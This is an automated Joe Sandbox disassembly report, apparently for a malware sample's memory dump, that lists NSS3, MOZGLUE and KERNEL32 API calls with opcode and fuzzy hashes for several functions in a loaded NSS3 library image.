Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.^l
API String ID: 1978757487-3800356567
Opcode ID: 9a95a10021858beb7a29ebcc3a7da6b28868ad895be4786587487588d45ff02b
Instruction ID: f6b3e0eadb246d376cf59379fa76b991b99eba9b381cd741ee7af07c6b781993
Opcode Fuzzy Hash: 9a95a10021858beb7a29ebcc3a7da6b28868ad895be4786587487588d45ff02b
Instruction Fuzzy Hash: FA217C70A09605AFD700AF69D8841A9BBF4FF88318F05456EE8989BB41DB30E854CBD7

Function 6C633E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_EnterMonitor.NSS3(?), ref: 6C633E45

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

PR_EnterMonitor.NSS3(?), ref: 6C633E5C
PR_EnterMonitor.NSS3(?), ref: 6C633E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C633EA6

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_ExitMonitor.NSS3(?), ref: 6C633EC0
PR_ExitMonitor.NSS3(?), ref: 6C633ED7
PR_ExitMonitor.NSS3(?), ref: 6C633EEE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 32475491639bfc939031d547b3f4e349e62c3b13f264545247cc09c204558d3d
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 6D119671514610ABD7315E29FC02AC777A1DB4130CF007835E95E86A60E636E52BC74F

Function 6C6B2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C6B2CA0
PR_ExitMonitor.NSS3 ref: 6C6B2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C6B2CD1
strdup.MOZGLUE(?), ref: 6C6B2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C6B2D27

Strings

Loaded library %s (static lib), xrefs: 6C6B2D22

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 67da37fe3d7e7a4e302984ef1c3e2724d35df5484fa516cd1ce002481f5b2d99
Instruction ID: 0b0d76a80aa8138dc7359e2ba977523689faf8321dd05d0188425fc5a1789f84
Opcode Fuzzy Hash: 67da37fe3d7e7a4e302984ef1c3e2724d35df5484fa516cd1ce002481f5b2d99
Instruction Fuzzy Hash: 941190B17012409BEB108F15DC58A6677F5AB4A31DF14853DD80997B41DB31E828CBA9

Function 6C5ABDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ABDCA

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABDDB

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABDEC

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C5ABE03

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5ABE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5ABE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5ABE3B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 3c8a238479692aa1f90db47d941e4b9fc40545223719b91055fece700bcda0af
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: CE01DB75B4121576FA1036A77C01F6F76884F9228DF144130FF05AAB82FB51D51A82FE

Function 6C600FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B
TlsGetValue.KERNEL32(00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601044
free.MOZGLUE(00000000,?,00000800,6C59EF74,00000000), ref: 6C601064

Strings

security, xrefs: 6C601025

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 7edff069eb8fcdcaa8a28aadfde66f4744cb6e066ec7f07e8a262b78ea5ba639
Instruction ID: 1132bd20f12531d57b57eafa42acd51b995e7335b269c3509d7417549e1fbef8
Opcode Fuzzy Hash: 7edff069eb8fcdcaa8a28aadfde66f4744cb6e066ec7f07e8a262b78ea5ba639
Instruction Fuzzy Hash: 9E01AB70B0029097E7242F3D9D04B863668BF4374CF00052AE88AA7E51EF70C154CBDE

Function 6C631C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C631C74

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C631C92
free.MOZGLUE(?), ref: 6C631C99
DeleteCriticalSection.KERNEL32(?), ref: 6C631CCB
free.MOZGLUE(?), ref: 6C631CD2

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 26db20fdbf0945b6d9cece12ea6b7f9fb4d4a7f4b5983154c4fa51b7fd2c4f1b
Instruction ID: 1987e39a7b57e946276fbd5176842361b0e21a836e62cc6442e4ff36abce3f91
Opcode Fuzzy Hash: 26db20fdbf0945b6d9cece12ea6b7f9fb4d4a7f4b5983154c4fa51b7fd2c4f1b
Instruction Fuzzy Hash: A00192F2F052216FDF20AFA49C0DB8A37B8A747359F101139E90EA2B40DF65E119879D

Function 6C642E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C643046

Part of subcall function 6C62EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C62EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C617FFB), ref: 6C64312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C643154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C642E8B

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Part of subcall function 6C62F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C619BFF,?,00000000,00000000), ref: 6C62F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C617FFA), ref: 6C642EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C64317B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 6d6fe4c79933c29fb2208fe4aba7f136c613389222d8d5d280f975b21450667c
Instruction ID: c040a5174ddae18b069ae6dcc13d4897c21216b7038fdb32e0ee04e384cd90d8
Opcode Fuzzy Hash: 6d6fe4c79933c29fb2208fe4aba7f136c613389222d8d5d280f975b21450667c
Instruction Fuzzy Hash: C0A1AC71A002189FDB24CF54CC80BEAB7B5EF4A308F1481A9E949A7741E771AD85CFA5

Function 6C60ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C60ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C60EDCE

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

free.MOZGLUE(00000000,?,?,?,?,6C60B04F), ref: 6C60EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C60EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C60EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C60EEFB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: e3f2993f40b0c781bdfef1bc12b6feff53ac7fc8f1584209342989ad4642bf64
Instruction ID: 06f67fd065ede9c8d51770c61b067f9a5c55f1350bad4ba9b043e94a414e01d6
Opcode Fuzzy Hash: e3f2993f40b0c781bdfef1bc12b6feff53ac7fc8f1584209342989ad4642bf64
Instruction Fuzzy Hash: 43818EB1B002099FEB18CF55DA84BAB77F5FF89308F144428E855A7751DB30E815CBA9

Function 6C60CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C60C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C60DAE2,?), ref: 6C60C6C2

PR_Now.NSS3 ref: 6C60CD35

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

Part of subcall function 6C5F6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C3F

PR_GetCurrentThread.NSS3 ref: 6C60CD54

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

Part of subcall function 6C5F7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1CCC,00000000,00000000,?,?), ref: 6C5F729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C60CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C60CE2C

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C60CE40

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

Part of subcall function 6C60CEE0: PORT_ArenaMark_Util.NSS3(?,6C60CD93,?), ref: 6C60CEEE
Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C60CD93,?), ref: 6C60CEFC
Part of subcall function 6C60CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C60CD93,?), ref: 6C60CF0B
Part of subcall function 6C60CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C60CD93,?), ref: 6C60CF1D

Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF47
Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF67
Part of subcall function 6C60CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C60CD93,?,?,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF78

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 530285ecdd5e3cf6c7ef38d07ffd18d173d52b8b95999fa4c8bb4c455bf0611c
Instruction ID: b4d6bd8282a73ad898f0c85a1ccb9c750883d562bd36f0efa8f6a6661f23360a
Opcode Fuzzy Hash: 530285ecdd5e3cf6c7ef38d07ffd18d173d52b8b95999fa4c8bb4c455bf0611c
Instruction Fuzzy Hash: 8551B576B00100ABE714DF69DD40B9A77F4EF48348F250524D956B7B50EB31ED06CBAA

Function 6C61FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C61FFE5

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C620004
PR_EnterMonitor.NSS3(?), ref: 6C62001B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 745f65faddce23283f2925797e37d35c2c1454f6149af7bb5ff4b8577be57c11
Instruction ID: 1de727de9668dedbe8a7bf57f7e6d1fc3feb30d95119d50bb7d1dc8f6c54c04f
Opcode Fuzzy Hash: 745f65faddce23283f2925797e37d35c2c1454f6149af7bb5ff4b8577be57c11
Instruction Fuzzy Hash: 464147752486808BE7204A69DCB97EB72A1DB4130DF10053DE45BCAEA0E7BDA549CF4E

Function 6C5DEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C5DEF38

Part of subcall function 6C5C9520: PK11_IsLoggedIn.NSS3(00000000,?,6C5F379E,?,00000001,?), ref: 6C5C9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C5DEF53

Part of subcall function 6C5E4C20: TlsGetValue.KERNEL32 ref: 6C5E4C4C
Part of subcall function 6C5E4C20: EnterCriticalSection.KERNEL32(?), ref: 6C5E4C60
Part of subcall function 6C5E4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CA1
Part of subcall function 6C5E4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CBE
Part of subcall function 6C5E4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CD2
Part of subcall function 6C5E4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D3A

PR_GetCurrentThread.NSS3 ref: 6C5DEF9E

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

free.MOZGLUE(00000000), ref: 6C5DEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5DF016
free.MOZGLUE(00000000), ref: 6C5DF022

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 96e99602cf0b33bb3cb0d64f869e5be2ecef360221664e58b336f89d5be15639
Instruction ID: 0cb3f2e0160e4a7ac191ab61283b633d12068b965d09c49cef207b2d2a25ef0c
Opcode Fuzzy Hash: 96e99602cf0b33bb3cb0d64f869e5be2ecef360221664e58b336f89d5be15639
Instruction Fuzzy Hash: EA41B371E0020AABDF018FA9DC85BEE7BB9AF48348F054025F915A7350E772D9158BA5

Function 6C5CCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C5CCF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C5CD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C5CD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CD025
PR_NewLock.NSS3 ref: 6C5CD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5CD074

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 5384328983dbd372d2e7bc177d4029337e81ae8ee7a9bf7b7e2dac66c09b8a63
Instruction ID: cdfbf399fe15dd82b572379c567bd655001cb4c1aaf71a70ade481559cbe65ff
Opcode Fuzzy Hash: 5384328983dbd372d2e7bc177d4029337e81ae8ee7a9bf7b7e2dac66c09b8a63
